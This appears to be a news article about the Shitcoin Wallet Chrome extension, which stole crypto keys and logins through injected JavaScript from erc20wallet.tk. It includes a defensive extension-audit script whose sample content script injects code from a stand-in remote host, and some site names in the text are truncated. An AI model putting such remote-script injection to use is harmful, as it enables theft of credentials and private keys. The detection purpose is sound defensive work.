The recently launched Google Chrome extension Shitcoin Wallet is not a crypto wallet but a well-disguised crypto stealer, according to Harry Denley, Director of Security at the MyCrypto platform. According to Denley, the extension injects JavaScript (JS) code into the victim’s web pages with the aim of stealing passwords and private keys from cryptocurrency wallets.
What is Shitcoin Wallet?
As described in its introductory blog post and on its official website, Shitcoin Wallet is an Ethereum wallet that lets users connect to the Ethereum blockchain. It not only gives users the means to manage, send and receive their Ether (cryptocurrency) but also allows them to interact with the thousands of ERC20 tokens that live on the Ethereum blockchain.
Why is it threatening?
Denley says the extension is threatening in two ways. First, any Ethereum (ETH) coins and ERC20-based tokens managed within the extension are at risk, since the extension sends the private keys of all wallets created or managed through its interface to a third-party website, erc20wallet.tk. Second, the extension injects malicious JS code when users navigate to certain popular cryptocurrency management platforms. The JS steals login credentials and private keys and sends the data to the same erc20wallet.tk website.
How does it happen?
According to ZDNet’s behavior analysis of Shitcoin Wallet, the process of injecting the malicious code is as follows:
- Users install the Chrome extension
- Chrome extension requests permission to inject JavaScript code on 77 websites (listed here)
- When users navigate to any of these 77 websites, the extension loads and injects an additional JS file from: https://erc20wallet[.]tk/js/content_.js
- This JS file contains obfuscated code
- The code activates on five websites: com, Idex.Market, Binance.org, NeoTracker.io, and Switcheo.exchange
- Once activated, the malicious JS code records the user’s login credentials, searches for private keys stored inside the dashboards of the five services, and, finally, sends the data to tk
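The chain above has two observable traits that a defender can look for before an extension is allowed into a fleet: a content script registered on a long list of hosts, and a content script that loads additional code from a remote origin at run time. The audit below is an added example and is not code from the article, from ZDNet or from the extension; the sample manifest, its host names and the remote origin are constructed placeholders (not the real list of 77 sites), and the host threshold and regular expressions are heuristics of my own rather than a published detection rule.

```javascript
// Added example, not code from the article or from the extension it describes.
// A small static audit of a Chrome extension bundle that flags the two traits
// the article attributes to Shitcoin Wallet: a content script registered on a
// large set of hosts, and a content script that pulls further code from a
// remote origin at run time. All data below is CONSTRUCTED: the host names and
// the remote origin are placeholders, not the real list of 77 sites.

// Heuristics for "this script loads or evaluates code it did not ship with".
const REMOTE_LOADER_PATTERNS = [
  /createElement\s*\(\s*['"]script['"]\s*\)/, // <script> element injection
  /\bfetch\s*\(/,                              // fetched-then-evaluated bodies
  /\bimport\s*\(/,                             // dynamic import
  /\beval\s*\(/,
  /new\s+Function\s*\(/,
];

// Any http(s) URL written as a string literal in the script.
const URL_LITERAL = /['"`](https?:\/\/[^'"`\s]+)['"`]/g;

// Collect the union of match patterns across all content_scripts entries.
function collectContentScriptMatches(manifest) {
  const out = new Set();
  for (const cs of manifest.content_scripts || []) {
    for (const pattern of cs.matches || []) out.add(pattern);
  }
  return [...out];
}

// Patterns that cover every site are a stronger signal than a long list.
function isBroadPattern(pattern) {
  return pattern === "<all_urls>" || /^(\*|https?):\/\/\*\//.test(pattern);
}

// Return the distinct origins of URL literals found in a script body.
function extractRemoteOrigins(source) {
  const origins = new Set();
  for (const match of source.matchAll(URL_LITERAL)) {
    try {
      origins.add(new URL(match[1]).origin);
    } catch (_) {
      // Not a parseable URL; ignore.
    }
  }
  return [...origins];
}

// Audit a manifest plus the source of its content scripts (file name -> text).
// Returns findings with a coarse severity, plus raw counts for reporting.
function auditExtension(manifest, scripts, { maxHosts = 10 } = {}) {
  const findings = [];
  const matches = collectContentScriptMatches(manifest);

  const broad = matches.filter(isBroadPattern);
  if (broad.length > 0) {
    findings.push({ severity: "high", rule: "broad-match", detail: broad.join(", ") });
  }
  if (matches.length > maxHosts) {
    findings.push({
      severity: "medium",
      rule: "many-hosts",
      detail: `content scripts requested on ${matches.length} match patterns`,
    });
  }

  const remoteOrigins = new Set();
  for (const [file, source] of Object.entries(scripts)) {
    const usesLoader = REMOTE_LOADER_PATTERNS.some((re) => re.test(source));
    const origins = extractRemoteOrigins(source);
    if (usesLoader && origins.length > 0) {
      origins.forEach((o) => remoteOrigins.add(o));
      findings.push({
        severity: "high",
        rule: "remote-code-load",
        detail: `${file} loads code from ${origins.join(", ")}`,
      });
    }
  }

  return { findings, hostCount: matches.length, remoteOrigins: [...remoteOrigins] };
}

// Constructed sample: 12 placeholder hosts and a content script that injects a
// <script> element pointing at a remote origin, the shape the article describes.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "sample-wallet-extension",
  version: "1.0",
  content_scripts: [
    {
      matches: Array.from({ length: 12 }, (_, i) => `*://site-${i}.example/*`),
      js: ["content.js"],
      run_at: "document_start",
    },
  ],
};

const SAMPLE_CONTENT_SCRIPT = [
  "var s = document.createElement('script');",
  "s.src = 'https://remote-host.example/js/content_.js';",
  "document.head.appendChild(s);",
].join("\n");

function runSampleAudit() {
  return auditExtension(SAMPLE_MANIFEST, { "content.js": SAMPLE_CONTENT_SCRIPT });
}

console.log(JSON.stringify(runSampleAudit(), null, 2));
```

Run it with `node` after unpacking the extension's `.crx` and pointing `auditExtension` at the parsed `manifest.json` and the text of each file listed under `content_scripts`. The check is purely static: it reports the twelve-host registration as `many-hosts` and the remote `<script>` injection as `remote-code-load`, but it only sees URL literals, so a script that assembles or decodes its download address at run time (the article notes the injected code was obfuscated) would slip past the origin check and surface only through the loader-pattern hit. Treat it as a triage aid that tells you which extensions deserve a dynamic look, not as proof that an extension is clean.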
What is alarming, though, is that virus scanning engines have not been able to detect this malicious code and show both the 32-bit and 64-bit installer files on Shitcoin Wallet’s official website as clean and legitimate.
Cryptocurrencies and their associated exchanges have been under constant attack from hackers in recent years. One such example is BITpoint, a Japan-based cryptocurrency exchange, which discovered an unauthorized withdrawal of $32 million from its hot wallet. The incident came to light when BITpoint tried to make a payment using the cryptocurrency Ripple and got an error message.
BITpoint held five cryptocurrencies in its hot wallet: Bitcoin, Bitcoin Cash, Ethereum, Litecoin, and Ripple. However, the company clarified that its cold wallet and cash holdings were not affected in the incident. BITpoint temporarily halted all payments in and out of the exchange “to prevent any harm to customer assets.”